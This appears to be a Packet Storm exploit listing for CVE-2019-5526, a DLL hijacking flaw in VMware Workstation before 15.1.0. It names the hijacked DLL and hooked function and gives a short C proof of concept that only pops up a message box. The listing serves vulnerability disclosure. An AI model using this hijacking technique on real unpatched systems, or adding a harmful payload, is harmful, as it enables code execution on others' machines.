Lucene search
Miguel Mendez ZPACKETSTORM:152946HistoryMay 16, 2019 - 12:00 a.m.
VMware Workstation DLL Hijacking
2019-05-1600:00:00
Miguel Mendez Z
packetstormsecurity.com
43
EPSS
0.002
Percentile
60.5%
`#---------------------------------------------------------
# Title: VMware Workstation DLL hijacking < 15.1.0
# Date: 2019-05-14
# Author: Miguel Mendez Z. & Claudio Cortes C.
# Team: www.exploiting.cl
# Vendor: https://www.vmware.com
# Version: VMware Workstation Pro / Player (Workstation)
# Tested on: Windows Windows 7_x86/7_x64 [eng]
# Cve: CVE-2019-5526
#---------------------------------------------------------
Description:
VMware Workstation contains a DLL hijacking issue because some DLL.
DLL Hijacking: shfolder.dll
Hooking: SHGetFolderPathW()
------Code_Poc-------
#include "dll.h"
#include <windows.h>
DLLIMPORT void SHGetFolderPathW()
{
MessageBox(0, "s1kr10s", "VMWare-Poc", MB_ICONINFORMATION);
exit(0);
}
--------------------------
https://www.vmware.com/security/advisories/VMSA-2019-0007.html
`
Related
prion
prion
Design/Logic Flaw
2019-05-15 16:29:00
cvelist
cvelist
CVE-2019-5526
2019-05-15 15:18:12
kaspersky
kaspersky
KLA12116 PE vulnerability in VMware Workstation and Player
2019-05-14 00:00:00
cve
cve
CVE-2019-5526
2019-05-15 16:29:00
nvd
nvd
CVE-2019-5526
2019-05-15 16:29:00
exploitdb
exploitdb
VMware Workstation 15.1.0 - DLL Hijacking
2019-05-16 00:00:00
exploitpack
exploitpack
VMware Workstation 15.1.0 - DLL Hijacking
2019-05-16 00:00:00
vmware
vmware
VMware Workstation update addresses a DLL-hijacking issue (CVE-2019-5526)
2019-05-14 00:00:00
nessus
nessus
zdt
zdt
VMware Workstation 15.1.0 - DLL Hijacking Exploit
2019-05-16 00:00:00